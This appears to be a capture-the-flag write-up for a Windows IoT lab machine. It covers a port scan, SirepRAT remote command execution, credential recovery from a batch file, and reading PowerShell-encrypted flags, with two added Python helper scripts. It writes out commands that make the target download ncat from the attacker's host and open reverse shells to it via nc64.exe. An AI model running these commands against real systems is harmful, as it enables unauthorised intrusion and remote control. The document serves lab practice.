Basic information

Port scan

135,8080:

$ nmap -Pn -sC -sV 10.10.10.204

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 14:12 CST
Nmap scan report for 10.10.10.204
Host is up (0.069s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.32 seconds

8080

Windows Device Portal, which requires a login:

This looks like Windows IoT. Searching around turns up a tool that can be used directly against it (it talks to the Sirep test service on TCP 29819, a port the default top-1000 nmap scan above does not cover, which is why it does not appear in the scan output):

SirepRAT

download ncat

It gives arbitrary command execution, for example to download a file (the target directory `spool\drivers\color` is chosen because it is writable by default):

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://10.10.14.15:7778/ncat.exe" --v

reverse shell

Reverse shell with nc:

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe 10.10.14.15 4444 -e powershell.exe" --v

whoami errors out; use $env:UserName instead.

Information gathering

In this directory there is a bat file containing two sets of credentials. The script runs in an endless loop: it strips every member from the local administrators group, resets the passwords of app and administrator, waits a few seconds, and starts over:

cd "c:\Program Files\WindowsPowershell\Modules\PackageManagement"
ls -force

r.bat

@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

Windows Device Portal

Back in the web portal on 8080, we can log in as app:mesh5143:
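The portal answered the unauthenticated nmap probe with `401 Unauthorized` and `Basic realm=Windows Device Portal`, so the login is plain HTTP Basic auth. The script below, an added example and not part of the original writeup, takes the credential pairs recovered from r.bat plus one deliberately wrong pair, tries each against the portal, and reports which ones are accepted. A small stand-in server is embedded so it runs offline; the real target URL (http://10.10.10.204:8080) and its exact response body are assumptions, and only the status code is relied on.

```python
"""Check which credential pairs the Windows Device Portal accepts over HTTP Basic auth.

Added example (not from the writeup). The embedded FakePortal mimics the
portal's observed behaviour: 401 + `WWW-Authenticate: Basic realm=Windows Device Portal`
without valid credentials, 200 with them. Replace the URL from start_fake_portal()
with the real portal to use check_credentials() for real.
"""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Two pairs recovered from r.bat on the box, plus one constructed wrong guess.
CANDIDATES = [
    ("app", "mesh5143"),
    ("administrator", "_1nt3rn37ofTh1nGz"),
    ("admin", "p@ssw0rd"),  # constructed, expected to fail
]


def basic_auth_header(user: str, password: str) -> str:
    """Build the Authorization header value for HTTP Basic auth."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def try_login(base_url: str, user: str, password: str, timeout: float = 5.0) -> int:
    """Return the HTTP status the portal gives for one credential pair."""
    req = Request(base_url + "/", headers={"Authorization": basic_auth_header(user, password)})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status
    except HTTPError as exc:  # 401 arrives as an exception from urlopen
        return exc.code


def check_credentials(base_url: str, candidates) -> dict:
    """Map each username to whether the portal accepted its password."""
    return {user: try_login(base_url, user, pw) == 200 for user, pw in candidates}


class FakePortal(BaseHTTPRequestHandler):
    """Stand-in for the portal: accepts the two r.bat pairs, rejects everything else."""

    VALID = {
        basic_auth_header("app", "mesh5143"),
        basic_auth_header("administrator", "_1nt3rn37ofTh1nGz"),
    }

    def do_GET(self):
        if self.headers.get("Authorization") in self.VALID:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Windows Device Portal\n")  # body is assumed
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", "Basic realm=Windows Device Portal")
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_portal():
    """Start the stand-in server on an ephemeral loopback port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), FakePortal)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def demo() -> dict:
    """Run the credential check against the embedded portal and return the results."""
    server, url = start_fake_portal()
    try:
        return check_credentials(url, CANDIDATES)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for user, ok in demo().items():
        print(f"{user}: {'accepted' if ok else 'rejected'}")
```

Against the real box, `try_login("http://10.10.10.204:8080", "app", "mesh5143")` is the same request the browser login dialog sends; keeping the check to a GET avoids the portal's CSRF handling, which only matters for state-changing requests.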

reverse shell

Processes -> Run command:

C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 4445 -e powershell.exe

This gives a shell as the app user:

user flag

The app user can read user.txt. The file is a PSCredential written with Export-Clixml, so it too has to be read from PowerShell, in a session running as app:

$credential = Import-CliXml -Path U:\Users\app\user.txt
$credential.GetNetworkCredential().Password

root flag

The bat file gave us two passwords, and for administrator the process is the same: log in on 8080, run a command to get a reverse shell, then read root.txt:

administrator _1nt3rn37ofTh1nGz

C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.15 4446 -e powershell.exe

$credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential.GetNetworkCredential().Password
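Both flags are read with Import-CliXml because Export-Clixml does not store a PSCredential's password in clear text: the `<SS>` element holds a DPAPI blob produced with the user's own master key, so only a process running as that user (app for user.txt, administrator for root.txt) can decrypt it, which is why each flag needs its own shell. The script below, an added example and not part of the original writeup, parses a constructed stand-in for such a file and reads the DPAPI header out of the blob without decrypting it. The XML and the blob bytes are made up for the demo; the DPAPI provider GUID and the header layout (version, provider GUID, master key version, master key GUID, flags) are the standard DPAPI_BLOB layout.

```python
"""Inspect a PSCredential exported with Export-Clixml, without PowerShell.

Added example (not from the writeup). SAMPLE_CLIXML is a constructed file with
the shape Export-Clixml produces; the blob is a hand-built DPAPI header, not a
real flag. The master key GUID it yields names the file under the writing
user's %APPDATA%\\Microsoft\\Protect\\<SID>\\ directory that would be needed to
decrypt it.
"""
import uuid
import xml.etree.ElementTree as ET

NS = {"ps": "http://schemas.microsoft.com/powershell/2004/04"}
# Every DPAPI blob carries this provider GUID right after the 4-byte version.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# Constructed blob: version 1, provider GUID, master key version 1,
# a made-up master key GUID, zero flags, empty description, then filler.
SAMPLE_BLOB_HEX = (
    "01000000"                            # dwVersion = 1
    "d08c9ddf0115d1118c7a00c04fc297eb"    # guidProvider (little-endian GUID)
    "01000000"                            # dwMasterKeyVersion = 1
    "11223344556677889900aabbccddeeff"    # guidMasterKey (constructed)
    "00000000"                            # dwFlags
    "00000000"                            # dwDescriptionLen = 0
    "10660000"                            # filler standing in for the rest
)

SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">{SAMPLE_BLOB_HEX}</SS>
    </Props>
  </Obj>
</Objs>
"""


def parse_pscredential(xml_text: str) -> dict:
    """Return {property name: (element kind, text)} for the first PSCredential object."""
    root = ET.fromstring(xml_text)
    obj = root.find("ps:Obj", NS)
    if obj is None:
        raise ValueError("no serialized object found")
    types = [t.text for t in obj.findall("ps:TN/ps:T", NS)]
    if "System.Management.Automation.PSCredential" not in types:
        raise ValueError(f"not a PSCredential: {types}")
    props = {}
    for el in obj.find("ps:Props", NS):
        kind = el.tag.split("}")[1]  # "S" = plain string, "SS" = secure string
        props[el.get("N")] = (kind, el.text or "")
    return props


def describe_secure_string(hex_blob: str) -> dict:
    """Parse the fixed DPAPI_BLOB header of a ConvertFrom-SecureString value."""
    blob = bytes.fromhex(hex_blob)
    if len(blob) < 44:
        raise ValueError("too short to be a DPAPI blob")
    provider = uuid.UUID(bytes_le=blob[4:20])
    return {
        "version": int.from_bytes(blob[0:4], "little"),
        "is_dpapi": provider == DPAPI_PROVIDER,
        "master_key_version": int.from_bytes(blob[20:24], "little"),
        "master_key_guid": str(uuid.UUID(bytes_le=blob[24:40])),
        "flags": int.from_bytes(blob[40:44], "little"),
    }


def inspect_credential(xml_text: str) -> dict:
    """Combine the username with what can be learned about the protected password."""
    props = parse_pscredential(xml_text)
    kind, password = props["Password"]
    if kind != "SS":
        raise ValueError("Password is not a SecureString; nothing to unprotect")
    info = describe_secure_string(password)
    info["username"] = props["UserName"][1]
    return info


if __name__ == "__main__":
    for key, value in inspect_credential(SAMPLE_CLIXML).items():
        print(f"{key}: {value}")
```

On a real user.txt the same parser tells you which account's master key is needed before you spend time on it: the user name is stored in clear, the password is not, and `is_dpapi` confirms the blob is user-scoped DPAPI rather than a key the file itself could reveal.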
